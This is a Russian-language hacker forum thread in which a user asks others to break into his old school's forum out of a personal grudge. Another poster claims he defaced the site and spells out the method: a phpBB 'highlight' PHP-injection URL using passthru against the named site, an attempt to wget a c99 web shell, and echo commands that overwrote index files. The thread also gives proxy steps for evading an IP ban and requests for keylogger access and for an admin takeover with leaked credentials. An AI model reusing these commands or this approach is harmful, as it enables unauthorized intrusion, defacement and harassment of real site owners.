Пожалуйста помогите!

[Vladik]

Сегодня на форуме школы где я учился администратор форума , написал сообшение которое просто обсирает меня перед всеми кто сидит на этом форуме. Вот ссылка на сообшение : http://www.hava.org.il/rus/forum/viewtopic.php?t=157

У меня нет проблем разбить рожи всем сидяшим на этом форуме , и так же самому админу. Админом я еше сам займусь.
Мне нужна ваша помошь. Если кто может уделить немного своего времени , взломать этот форум и хотябы просто удалить это сообшение , или если возможнo на[мат] стереть весь форум. Я ненавижу админа так же как и он меня , поэтому он это и делает.

Все что я про него знаю , он не хакер , и сайт его взломать будет не проблема для хакера. Пожалуйста , я к вам обрашяюсь как к людям , а не как к хакерам , помогите пожалуйста. Удалите это сообшение. Я вам клянусь меня это сообшение очень сильно затронуло.
Если будет нужна моя помошь в чем то зовите , клянусь не откажу. Мне просто обидно что он такое пишет.
Извените если вы зря потратили время начтение моего сообшения.
С уважением Владик.

 

[Shrek]

Гы, задефейсил =) Даже индекс =)
Владика упомянул =)
Вот скрины (минимум дизайна, т.к. обрезались <> =( )

 

[Vladik]

Спасибо тебе огромное Шрек !!!!!! КЛЯНУСЬ , помогу чем смогу , ты мне зделал огромное одолжение . СПАСИБО ТЕБЕ ОГРОМНОЕ ШРЕК !!! За такое тебя действительно стоит уважать , не только за работу , а за то что ты не просто Хакер , а самое главное что ты человек. Я даже не знаю как тебя одблогодорить . Стучи в асю 243928279 , если что то надо , я не Хакер , но простыми вешами могу помочь . И спасибо что мое имя упомянул. ШРЕК СПАСИБО , и еше раз спасибо !!! Клянусь не забуду , и клянусь что никога не пожалею о том что сейчас клянусь (прям как в бригаде). Спасино Шрек !

И еше вопрос к тебе , он сможет востановить сайт обратно ?

 

[Vladik]

Шрек , у меня опять проблемы. Он вернул сайт , но самое обидное то что он запретил моему ip заходить на форум. Я никак не могу зайти. Подскажи как зделать анонимный , или если можешь дефейсни еше раз. Только если можешь так чтобы он или не смог вернуть или оченпсильно посторался для этого. Но я не понимаю как он вернул сайт. Он не хакер , и за ночь вернул.

 

[TimON]

Честно говоря почитал я что написано про Владика там и его последний пост здесь, ламер ты Владик непробиваемый. ЛОЛ :crazy:

 

[n1†R0x]

А мне работа фотошопом причудилась в скрине...
Видимо лишь глюк, но почему вокруг шрифта какая-то обводка? Другого цвета, не как фон..

 

[TimON]

Обводка потому, что сохранено в jpg, она смазывает границы, вот в гифе наоборот четко.

 

[Exil]

ага-ага.
дефейс я видел не на скрине.

 

[n1†R0x]

Ясно... Ну и я говорю, "причудилась".

 

[Shrek]

http://www.hava.org.il/rus/forum/info.txt
Если кто-то все еще не верит =)

 

[n1†R0x]

http://www.hava.org.il/rus/forum/info.txt
Если кто-то все еще не верит =)

Да верим мы, верим.. Ты лучше расскажи как ломанул =)

 

[Shrek]

N1TR0X
Хорошо. Рассказываю. =)
Самая последняя уязвимость в пхпбб - баг с хайлайтом aka highlight в viewtopic скрипте =) Кстати, есть сплойт на этот баг, "любезно предоставленный Sad-ом", но я им не юзался. Все гораздо проще делается в строке браузера. =)
Для проверки я сделал вот такой запрос
_http://www.hava.org.il/rus/forum/viewtopic.php?t=157&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).'
Т.е. заставил Линуховый сервак выполнить системную команду ls (вывод списка файлов и каталогов в текущем каталоге)
И что вы думаете? Я получил этот список.
Далее cmd=wget
wget стоит!!! =) Но тут облом. wget мой_сайт_на_народе/filew.php (c99shell %) ) не пошел!!! Просто не качал и все тут... Но мы не простаки и полезли изучать линуховые комманды и их совокупности =)
Пришли к следующему:
Комманда echo "123" | > info.txt создает(или при наличии файла очищает) файл и записывает в него строку "123"
Так я создал тот самый info.txt и задефейсил index.php форума.
Но этого мало =) Решил убить индекс сайта =)
Т.к. команды я посылал с www/rus/forum, а index.htm лежал в www, то я в одной комманде выполнил сразу 2 =)
cmd=cd ../../; echo "OwNeD and DeFaCeD by xShreKx. Special for Vladik" | > index.htm
Вот и все =)
Горе-Админ все же пофиксил багу и снял дефейс, но облом получил конкретный.
Кстати, совету моему горе-просителю-благодарителю Владику (Залогинился бы просто, как Влад, а то Владик....). Зайди на сайт/форум через прокси-сервер =) Если не знаешь что это такое или как это делается, пошарь по форуму, вроде где-то это обсуждалось, причем очень подробно... Слишком подробно

P.S. (про дефейс)
Если бы залил веб-шелл, то сделал бы дефейс покрасивее. А так не смог, т.к. <;> - служебные символы в Линухе...

Добавляю....

Шрек , у меня опять проблемы. Он вернул сайт , но самое обидное то что он запретил моему ip заходить на форум. Я никак не могу зайти. Подскажи как зделать анонимный , или если можешь дефейсни еше раз. Только если можешь так чтобы он или не смог вернуть или оченпсильно посторался для этого. Но я не понимаю как он вернул сайт. Он не хакер , и за ночь вернул.

Сперва я думал не отвечать, но твое простодушие меня просто убивает...
Короче, я на 99% уверен, что ты сидишь в осле (Internet Explorer - далее осел =) ). Поэтому вот тебе все-таки мануал(aka инструкция) по использованию прокси-серверов в осле. Первое, что нужно сделать - найти прокси-сервер. Пока можешь ограничеться сайтом proxy4free.net. Когда ты увидишь огромный список, содержащий что-то подобное:
proxy123.us:80
123.231.133.24:80
anonymous.de:3128
Бери любой (просто скопируй куда-нибудь, главное, чтобы ты его имел =))
Теперь немного теории. proxy123.us - это Адрес сервера. Тоже самое, что 123.231.133.24, только в доменном виде. 80 или 3128 - это Порт, а : - просто условный разделитель. Теория закончилась =). Но нам надо как-то работать через этот прокси сервер. Для этого открываешь Свойства обозревателя через пункт меню "Сервис"-"Свойства обозревателя". Переходишь на закладку "Подключения" и выбираешь подключение, которое используешь. Далее жмешь кнопку "Настройка", находящуюся справа от списка возможных подключений. Там есть раздел Прокси-сервер. Ставишь галочку напротив "Использовать прокси-сервер для этого подключения(не применяется для других подключений)". В ставших доступными полях Адрес и Порт вбиваешь соответственно Адрес и Порт прокси сервера, который ты нагло скопировал и не должен был потерять =). Все!
Теперь проблемы.
Проксик может быть убитым, поэтому ты просто не получишь ничего, кроме "Не могу подключиться к удаленному ресурсу" - не отчаивайся, скопируй адрес другого прокси-сервера из огромного списка и повтори те же операции. Делай это до тех пор, пока не добьешься успеха.
Не советую вводить очень важные пароли, используя прокси - есть риск их потерять, т.к. самый надежный проксик - проксик, сделанный своими руками =)
Вот и все, 100%. Будут вопросы - попытайся решить сам. Если после 13 попытки не получится - обращайся, может помогу =)
А сайт задефейсить снова пока не получится... Не такие мы всесильные.
А чтобы восстановить сайт, админу всего лишь надо было залить бек-ап на сервак. Думаешь, на его машине не было копии его же сайта? =)
Добавлено [time]1123945064[/time]
Никогда не писал таких больших сообщений!

 

[Vladik]

Спасибо Шрек за такую подробную инсрукцию. Я попробую . Но если не ошибаюсь , ты дефейснул форум еше раз ? Не так ли? Да я не Хакер , обычный пользователь , все что я умею так это я лажу по Хакерским сайтам , читаю все статьи , качаю все программы , сканеры , трояны и пробую их
И еше всем кто не верит что Шрек задефейсил не только форум но и индекс вот вам ссылка на картинку , я зафоткал как только Шрек дефейснул сайт : http://img357.imageshack.us/img357/1931/hava7pu.jpg
Спасибо Шрек !!!

 

[n1†R0x]

качаю все программы , сканеры , трояны и пробую их

Прикольная фраза

 

[david]

Vladik, давай хочешь прогу крутую пришлю тоже опробуешь.

 

[Shrek]

david_
Пинч? Зверская прога, пришли мне, пожалуйста, я бы тебе за нее заплатил, но если за просто так отдашь exe-шник буду благодарен до гроба. :lol2:

 

[©yBe®0Ge№]

Shrek нет тех людей просишь ) ты же знаешь к кому надо обращаться

 

[Shrek]

©yBe®0Ge№
КАНЕЧНО, ЧЮВАК, как я мог забыть?! Дай пинча нахаляву =)

 

[Vladik]

Давид , я же не настолько дурак. Я понимаю что на сайтах выкладывають программы , а не уже собраные трояны . Если пошлешь мне один файл ехе , я его просто не открою, но с другой стороны , ты ничего такого особого не найдешь у меня на компе.
Кстати если кто может дать ссылку на сайт или обяснить по аське как иметь доступ к компу если я знаю ай-пи жертвы. Поставить клавиатурный шпион и т.д. Есть акой сайт там где все это описывается.
И еше вопрос ко Шреку , мне один человек , я сам не знаю кто дал : basa , name , имя и пароль от форума который ты задефейсил. Что с ними можно зделать ? Можно ли с этими данымы быть админом форума , и удалить админа который сейчас и всех модераторов ? Если да , как это зделать.

 

[kievman]

Спасибо Шрек за такую подробную инсрукцию. Я попробую . Но если не ошибаюсь , ты дефейснул форум еше раз ? Не так ли? Да я не Хакер , обычный пользователь , все что я умею так это я лажу по Хакерским сайтам , читаю все статьи , качаю все программы , сканеры , трояны и пробую их
И еше всем кто не верит что Шрек задефейсил не только форум но и индекс вот вам ссылка на картинку , я зафоткал как только Шрек дефейснул сайт : http://img357.imageshack.us/img357/1931/hava7pu.jpg
Спасибо Шрек !!!

фотоаппаратом зафоткал?? :lol2: